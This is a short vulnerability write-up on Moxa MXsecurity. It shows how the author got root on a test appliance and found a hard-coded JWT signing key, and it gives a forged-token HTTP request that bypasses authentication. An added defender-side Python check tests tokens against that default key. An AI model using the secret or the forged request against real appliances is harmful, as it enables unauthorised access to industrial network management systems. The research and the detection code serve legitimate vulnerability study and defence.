Moxa MXsecurity hard-coded credential authentication bypass / SSH pseudo-shell command injection

Warning
This post was last updated on 2023-05-26; its contents may be out of date.

# Download and installation

https://www.moxa.com/en/products/industrial-network-infrastructure/network-management-software/mxsecurity-series?viewmode=0#resources

https://moxa.com/getmedia/8e5b2588-de24-4bb1-ae58-16354ee70662/moxa-mxsecurity-series-manual-v1.0.pdf

# Logging in over SSH

Logging in as the admin user only gets you a CLI program, not bash, so you need to mount the vmdk and edit /etc/shadow to replace the password hash of the user1 account.

```
user1:$6$xPyopDlu$p3jdHPn3XG8OToD6acaXPBtVQgIvx.fUor0rJEtL0qgLqfPDcPvKlC0eDa77P5afST3Hrg7DFlPQrdqAHSisY1:19188:0:99999:7:::
```

The password is qwe123!@#

Then log in as user1 and sudo to root.


# Source code

The application runs under docker, so you can simply docker cp it out of the container.

```
[root@mxsecurity user1]# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED         STATUS                   PORTS                                                                                  NAMES
0173ff8b578c   nsm-web                         "python3 -u run.py"      8 minutes ago   Up 8 minutes             0.0.0.0:443->443/tcp, :::443->443/tcp                                                  nsm-web
eb9dcdd27d4b   nsm-receiver                    "python3 -u run.py"      8 minutes ago   Up 8 minutes                                                                                                    nsm-receiver
44dc99289cb6   eclipse-mosquitto:1.6-openssl   "/docker-entrypoint.…"   8 minutes ago   Up 8 minutes             0.0.0.0:1883->1883/tcp, :::1883->1883/tcp, 0.0.0.0:8883->8883/tcp, :::8883->8883/tcp   nsm-broker
d2175f582fac   cturra/ntp                      "/bin/sh /opt/startu…"   8 minutes ago   Up 8 minutes (healthy)   0.0.0.0:123->123/udp, :::123->123/udp                                                  nsm-ntp
[root@mxsecurity user1]# docker cp 0173ff8b578c:/app/ /tmp/
```

# Hard-coded JWT key

```python
APP.config["JWT_SECRET_KEY"] = "MXsecurity secret key"
APP.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
APP.config["JWT_TOKEN_LOCATION"] = ["headers", "cookies"]
JWT = JWTManager(APP)
```

Forge one:

```http
GET /api/v1/system/status HTTP/1.1
Host: 172.16.16.204
Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.sO6cu-ly2D6e7ZctlVuBcF4CkNmZvbMuwQU7U-xyM2g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Skiploading: true
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://172.16.16.204/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
```
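A defender-side check for the hard-coded key above, added here as an example and not part of the original post or of Moxa's code: it tells whether a token issued by an appliance still verifies under the vendor default (meaning that instance is still running the vulnerable config) and gives a startup guard that rejects such a secret; the function names and the sample token issuer are my own assumptions, stdlib only.

```python
import base64
import hashlib
import hmac
import json

# The vendor default quoted on this page, taken from the nsm-web Flask config.
MXSECURITY_DEFAULT_SECRET = "MXsecurity secret key"

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def hs256_signature(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()

def verifies_under_secret(token: str, secret: str) -> bool:
    """True if token is a well-formed HS256 JWT whose signature matches secret."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64, bad UTF-8 or bad JSON
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False  # alg=none / key-confusion tricks are a separate check
    expected = hs256_signature(f"{header_b64}.{payload_b64}".encode(), secret)
    return hmac.compare_digest(expected, sig)

def uses_vendor_default(token: str) -> bool:
    """Audit check: a token minted by the appliance that verifies under the
    hard-coded key means the instance still runs the vulnerable config."""
    return verifies_under_secret(token, MXSECURITY_DEFAULT_SECRET)

def jwt_secret_is_acceptable(secret: str) -> bool:
    """Startup guard for a hardened config: read JWT_SECRET_KEY from the
    environment or a secrets file and refuse to start when this is False."""
    return len(secret) >= 32 and secret != MXSECURITY_DEFAULT_SECRET

def make_sample_token(secret: str, payload: dict) -> str:
    """Constructed sample issuer so the audit check can be exercised offline;
    the header matches the one in the captured request above."""
    header_b64 = _b64url(b'{"typ":"JWT","alg":"HS256"}')
    payload_b64 = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hs256_signature(f"{header_b64}.{payload_b64}".encode(), secret)
    return f"{header_b64}.{payload_b64}.{_b64url(sig)}"
```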


# SSH pseudo-shell command injection

At first I assumed it was a command injection in the web interface, but after reading the advisory more carefully I found it is a command injection in the /bin/cli program.


My verdict: it is of very little practical use.

Sloppy writing, flippant wording, shallow content and clumsy technique. Pointers and corrections from the masters are welcome; many thanks.